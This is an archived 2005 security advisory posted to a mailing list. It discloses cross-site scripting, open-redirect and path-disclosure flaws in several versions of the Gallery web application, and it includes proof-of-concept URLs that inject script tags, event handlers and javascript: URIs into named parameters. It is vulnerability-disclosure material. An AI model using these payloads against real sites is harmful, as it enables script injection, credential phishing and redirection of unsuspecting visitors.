|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability
From: Rafel Ivgi, The-Insider (theinsider
012.NET.IL)
Date: Mon Jan 17 2005 - 14:34:43 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Gallery
Vendors: http://gallery.sourceforge.net
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms: Windows
Bug: Cross Site Scripting Vulnerability
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insidermail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Gallery is open to Cross Site Scripting vulnerability, allowing a remote
attacker to inject and execute scripts on the user’s machine while visiting
a remote gallery.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
‘index’ field. The injection can be done using the classical tag closing:
"><script>alert()</script>
For Example:
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">
<script>alert()</script>
Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
in ALL the fields. The ‘slideshow_low.php’ contains the following form
fields:
set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir
The injection can be done using the classical tag closing:
"><script>alert()</script>
For Example:
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
ide_dir=1
Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
‘username’ field. The injection can be done using hex encoded tag closing
and an HTML event:
%22%20onactivate%3D"alert%28%29"
For Example:
http://<valid
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"
Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
‘username’ field.
The injection can be done using hex encoded tag closing and an HTML event:
%22%20onactivate%3D"alert%28%29"
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
onactivate%3Dalert%28%29%3e
This version of Gallery also has an open redirection, which is a security
risk because
an attacker can send someone a link with a redirection to his evil host name
or to cause
the user to commit an attack or waste a target’s resources.
For Example:
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape
encoded evil
host name>&cmd= All the vulnerabilities described above can be used to
remotely call
a JavaScript file The injected JavaScript code is responsible for:
Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with
login)
Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
‘g2_form[subject]’
field. The injection can be done using an inline javascript protocol call:
javascript:alert()
For Example:
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert
()[/img]&g2_form[action][preview]=preview
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
‘g2_subView’ parameter. It is possible the replace any valid subView value
such as: comment
:ShowComments with the admin value: core:UserAdmin. This causes the gallery
to wait 30 seconds
and then print out the Full Path of the gallery on the server.
For Example:
http://<valid host>/g2/main.php?g2_return= http://<valid
host>/main.php%3Fg2_view%3Dcore
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
id such as:
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core
:UserAdmin
Then the following data will be printed out to the attacker:
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/UserAdmin.inc on line 55
Second Time
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/classes/GalleryUtilities.class on line 596
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Gallery v1.3.4-pl1
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
ert()</script>
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"
Gallery v1.4.4-pl2
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
/%20onactivate%3Dalert%28%29%3e<plaintext>
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
.google.com&cmd=
Gallery v2.0 Alpha
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
]=preview
2)
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]